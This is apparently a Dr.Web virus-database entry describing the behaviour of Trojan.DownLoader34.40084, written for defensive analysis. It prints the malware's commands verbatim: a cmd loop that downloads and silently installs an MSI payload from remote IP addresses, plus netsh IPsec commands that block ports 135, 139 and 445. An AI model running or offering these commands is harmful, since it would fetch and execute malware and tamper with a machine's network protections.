Trojan.DownLoader34.40084

Added to the Dr.Web virus database: 2020-09-14

Virus description added: 2020-09-16

Technical Information

To ensure autorun and distribution

Sets the following service settings

[<HKLM>\System\CurrentControlSet\Services\PolicyAgent] 'Start' = '00000002'

Modifies file system

Creates the following files

%WINDIR%\sysupdate.log
%WINDIR%\winupdate64.log

Network activity

TCP

HTTP GET requests

http://14#.###.27.140:13270/785AD053.moe via 14#.#55.27.140

Miscellaneous

Creates and executes the following

'%WINDIR%\syswow64\cmd.exe' /c for /d %i in (145.255.27.140:13270 114.142.145.190:18049 115.231.218.13:11819) do Msiexec /i http://%i/785AD053.moe /Q' (with hidden window)
'%WINDIR%\syswow64\netsh.exe' interface ipv6 install' (with hidden window)
'%WINDIR%\syswow64\netsh.exe' ipsec static add policy name=qianye' (with hidden window)
'%WINDIR%\syswow64\netsh.exe' ipsec static add filterlist name=Filter1' (with hidden window)
'%WINDIR%\syswow64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=TCP' (with hidden window)
'%WINDIR%\syswow64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=TCP' (with hidden window)
'%WINDIR%\syswow64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=TCP' (with hidden window)
'%WINDIR%\syswow64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=UDP' (with hidden window)
'%WINDIR%\syswow64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=UDP' (with hidden window)
'%WINDIR%\syswow64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=UDP' (with hidden window)
'%WINDIR%\syswow64\netsh.exe' ipsec static add filteraction name=FilteraAtion1 action=block' (with hidden window)
'%WINDIR%\syswow64\netsh.exe' ipsec static add rule name=Rule1 policy=qianye filterlist=Filter1 filteraction=FilteraAtion1' (with hidden window)
'%WINDIR%\syswow64\netsh.exe' ipsec static set policy name=qianye assign=y' (with hidden window)

Executes the following

'%WINDIR%\syswow64\cmd.exe' /c for /d %i in (145.255.27.140:13270 114.142.145.190:18049 115.231.218.13:11819) do Msiexec /i http://%i/785AD053.moe /Q
'%WINDIR%\syswow64\msiexec.exe' /i http://14#.###.27.140:13270/785AD053.moe /Q
'%WINDIR%\syswow64\netsh.exe' interface ipv6 install
'%WINDIR%\syswow64\netsh.exe' ipsec static add policy name=qianye
'%WINDIR%\syswow64\netsh.exe' ipsec static add filterlist name=Filter1
'%WINDIR%\syswow64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=TCP
'%WINDIR%\syswow64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=TCP
'%WINDIR%\syswow64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=TCP
'%WINDIR%\syswow64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=UDP
'%WINDIR%\syswow64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=UDP
'%WINDIR%\syswow64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=UDP
'%WINDIR%\syswow64\netsh.exe' ipsec static add filteraction name=FilteraAtion1 action=block
'%WINDIR%\syswow64\netsh.exe' ipsec static add rule name=Rule1 policy=qianye filterlist=Filter1 filteraction=FilteraAtion1
'%WINDIR%\syswow64\netsh.exe' ipsec static set policy name=qianye assign=y

Attempts to shut down the Windows operating system.

Technologies

Terminology

Training and education

Myths

Trojan.DownLoader34.40084

Technical Information

Curing recommendations

Free trial